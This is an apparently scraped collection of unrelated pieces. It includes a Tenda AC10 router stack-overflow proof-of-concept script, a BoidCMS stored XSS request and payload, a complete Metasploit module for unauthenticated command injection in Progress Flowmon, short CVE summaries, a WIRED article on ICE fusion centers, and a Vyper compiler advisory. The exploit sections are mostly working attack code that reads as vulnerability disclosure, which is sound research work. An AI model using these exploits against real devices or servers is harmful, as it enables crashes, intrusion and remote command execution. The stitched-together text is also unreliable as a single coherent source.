Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/saveParentControlInfo.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/saveParentControlInfo, In saveParentControlInfo, deviceName and deviceId are controllable and will be passed into the set\_device\_name function. In the set\_device\_name function, dev\_name will be spliced into mib\_vlaue by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'deviceId=1&deviceName=' + p1

p3 \= b"POST /goform/saveParentControlInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42171: IOT_Vul/readme.md at main · z1r00/IOT_Vul

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Flowmon versions before v12.03.02.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Flowmon Unauthenticated Command Injection',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in Progress Flowmon          versions before v12.03.02.        },        'Author' => [          'Dave Yesland with Rhino Security Labs',        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-2389'],          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']        ],        'DisclosureDate' => '2024-04-23',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [ REPEATABLE_SESSION ]        },        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Targets' => [['Automatic', {}]],        'Privileged' => false,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])    ])  end  def execute_command(cmd)    send_request_cgi(      'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),      'method' => 'GET',      'vars_get' => {        'file' => rand_text_alphanumeric(8),        'lang' => rand_text_alphanumeric(8),        'pluginPath' => "$(#{cmd})"      }    )  end  def exploit    print_status('Attempting to execute payload...')    execute_command(payload.encoded)  end  def check    print_status("Checking if #{peer} can be exploited!")    uri = normalize_uri(target_uri.path, 'homepage/auth/login')    res = send_request_cgi(      'uri' => uri,      'method' => 'GET'    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'    # Use a regular expression to extract the version number from the response    version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})    return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]    print_status("Detected version: #{version[1]}")    if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')      CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")    else      CheckCode::Safe("Version #{version[1]} is not vulnerable.")    end  endend

Flowmon Unauthenticated Command Injection

File upload vulnerability in GFI Mail Archiver versions up to and including 15.1 via insecure implementation of Telerik Web UI plugin which is affected by CVE-2014-2217, and CVE-2017-11317.

CVE-2021-29281: Unrestricted File Upload | OWASP Foundation

The Filter Portfolio Gallery WordPress plugin through 1.5 is lacking Cross-Site Request Forgery (CSRF) check when deleting a Gallery, which could allow attackers to make a logged in admin delete arbitrary Gallery.

CVE-2021-24795

The Simple Membership WordPress plugin before 4.0.9 does not have CSRF check when deleting members in bulk, which could allow attackers to make a logged in admin delete them via a CSRF attack

CVE-2022-0328

The Amelia WordPress plugin before 1.0.47 does not have CSRF check in place when deleting customers, which could allow attackers to make a logged in admin delete arbitrary customers via a CSRF attack

CVE-2022-0616

In Rancher 2.x before 2.6.13 and 2.7.x before 2.7.4, an incorrectly applied authorization check allows users who have certain access to a namespace to move that namespace to a different project.

CVE-2020-10676: Announcements

Built to combat terrorism, fusion centers give US Immigration and Customs Enforcement a way to gain access to data that’s meant to be protected under city laws limiting local police cooperation with ICE.

On the campaign trail and in recent days, Donald Trump has detailed extensive plans for immigration crackdowns and mass deportations during his second term as United States president. These initiatives would, he has said, include aggressive operations in areas known as “sanctuary cities” that have laws specifically curtailing local law enforcement collaboration with US Immigration and Customs Enforcement (ICE).

With these promises looming, a new report from researchers at the Surveillance Technology Oversight Project (STOP), a pro-privacy nonprofit, details the ways that federal/local data-sharing centers known as “fusion centers” already result in cooperation between federal immigration authorities and sanctuary-city law enforcement.

Run by the US Department of Homeland Security, of which ICE is a part, fusion centers emerged in the wake of the September 11, 2001, attacks as a counterterrorism initiative for integrating intelligence between federal, state, and local law enforcement. Fusion centers spent $400 million in 2021, according to public records. And, as STOP researchers point out, in more than two decades the centers have never proven their worth for their stated purpose of addressing terrorism in the US. Unnamed DHS officials told a Senate panel in 2012, for example, that fusion centers produce “predominantly useless information” and “a bunch of crap.”

In addition to aggressive investigative tactics like pulling data from schools and abortion clinics, ICE agents have leaned on fusion centers for years to get everything from photos of suspects to license plate location data and more—often in a pipeline that includes input from law enforcement working in sanctuary cities.

“This is an area where it’s highly profitable for localities to cooperate with ICE, and because it’s not highly visible it oftentimes faces less pushback," says STOP executive director Albert Fox Cahn. “This sort of information sharing capacity on this scale across all these agencies. tapping into everything from local utility records and DMV records to school records has the potential to be deployed in any number of chilling scenarios.”

ICE did not immediately return a request from WIRED for comment.

Fox Cahn adds that the concept of sanctuary cities wasn't always viewed by regional cops as an inconvenience to work around. “Until recently a lot of law enforcement agencies were very vocal in supporting sanctuary city protections, because they feared that ICE collaboration would actually hurt public safety if immigrants were not willing to come forward when they were victims of a crime or witness to a crime,” he says. “But police have become much more politically engaged on immigration in recent years.”

Fusion centers give ICE officers a forum through which to request data from local law enforcement databases in sanctuary cities and take advantage of regional surveillance tools, including publicly deployed face recognition systems, that can't be directly used to aid deportation efforts under sanctuary laws. STOP argues that when cops from sanctuary cities share data with ICE through fusion centers, it believes they may be violating local laws, but the activity is less obviously a violation than if the sharing happened through a direct channel.

In addition to undermining the entire purpose and premise of sanctuary city laws, STOP researchers point out, such erosion of guardrails around data sharing broadly could easily become a national security issue if a foreign actor were to infiltrate a fusion center. And domestically, the free-wheeling environment within fusion centers means that law enforcement could easily turn the spotlight onto additional types of investigations without warning.

“What we’ve seen over and over again is that the policing infrastructure we’ve built up in the name of combatting one evil then gets re-purposed for another," Fox Cahn says. “People who maybe don’t care as much about immigration need to recognize that if this infrastructure can be re-targeted at undocumented communities the way it has been today, it can be repurposed for any number of policing priorities in the future.”

Fusion centers will almost certainly play a role in the Trump administration's immigration agenda, but the STOP research is a reminder that these information-sharing hubs may well be at the center of other far-flung law enforcement initiatives as well.

Immigration Police Can Already Sidestep US Sanctuary City Laws Using Data-Sharing Fusion Centers

### Impact
the `slice()` builtin can elide side effects when the output length is 0, and the source bytestring is a builtin (`msg.data` or `<address>.code`). the reason is that for these source locations, the check that `length >= 1` is skipped:
https://github.com/vyperlang/vyper/blob/68b68c4b30c5ef2f312b4674676170b8a6eaa316/vyper/builtins/functions.py#L315-L319

the result is that a 0-length bytestring constructed with slice can be passed to `make_byte_array_copier`, which elides evaluation of its source argument when the max length is 0:
https://github.com/vyperlang/vyper/blob/68b68c4b30c5ef2f312b4674676170b8a6eaa316/vyper/codegen/core.py#L189-L191

the impact is that side effects in the `start` argument may be elided when the `length` argument is 0, e.g. `slice(msg.data, self.do_side_effect(), 0)`.

the following example illustrates how the issue would look in user code
```vyper
counter: public(uint256)

@external
def test() -> Bytes[10]:
    b: Bytes[10] = slice(msg.data, self.side_effect(), 0)
    return b

def side_effect() -> uint256:
    self.counter += 1
    return 0
```

the severity assigned is low, since this is not a very useful pattern and unlikely to be found in user code.

### Patches

the fix is tracked in https://github.com/vyperlang/vyper/pull/4645, which disallows any invocation of `slice()` with length 0, including for the ad hoc locations discussed in this advisory.

### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_

### References
_Are there any links users can visit to find out more?_

**Impact**

the slice() builtin can elide side effects when the output length is 0, and the source bytestring is a builtin (msg.data or <address>.code). the reason is that for these source locations, the check that length >= 1 is skipped:  
https://github.com/vyperlang/vyper/blob/68b68c4b30c5ef2f312b4674676170b8a6eaa316/vyper/builtins/functions.py#L315-L319

the result is that a 0-length bytestring constructed with slice can be passed to make_byte_array_copier, which elides evaluation of its source argument when the max length is 0:  
https://github.com/vyperlang/vyper/blob/68b68c4b30c5ef2f312b4674676170b8a6eaa316/vyper/codegen/core.py#L189-L191

the impact is that side effects in the start argument may be elided when the length argument is 0, e.g. slice(msg.data, self.do_side_effect(), 0).

the following example illustrates how the issue would look in user code

counter: public(uint256)

@external
def test() \-> Bytes\[10\]:
    b: Bytes\[10\] \= slice(msg.data, self.side\_effect(), 0)
    return b

def side\_effect() \-> uint256:
    self.counter += 1
    return 0

the severity assigned is low, since this is not a very useful pattern and unlikely to be found in user code.

**Patches**

the fix is tracked in vyperlang/vyper#4645, which disallows any invocation of slice() with length 0, including for the ad hoc locations discussed in this advisory.

**Workarounds**

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

**References**

_Are there any links users can visit to find out more?_

**References**

*   GHSA-3vcg-j39x-cwfm
*   https://nvd.nist.gov/vuln/detail/CVE-2025-47774
*   vyperlang/vyper#4645
*   https://github.com/vyperlang/vyper/blob/68b68c4b30c5ef2f312b4674676170b8a6eaa316/vyper/builtins/functions.py#L315-L319
*   https://github.com/vyperlang/vyper/blob/68b68c4b30c5ef2f312b4674676170b8a6eaa316/vyper/codegen/core.py#L189-L191

Search

lenovo warranty check/lookup | check warranty status | lenovo support us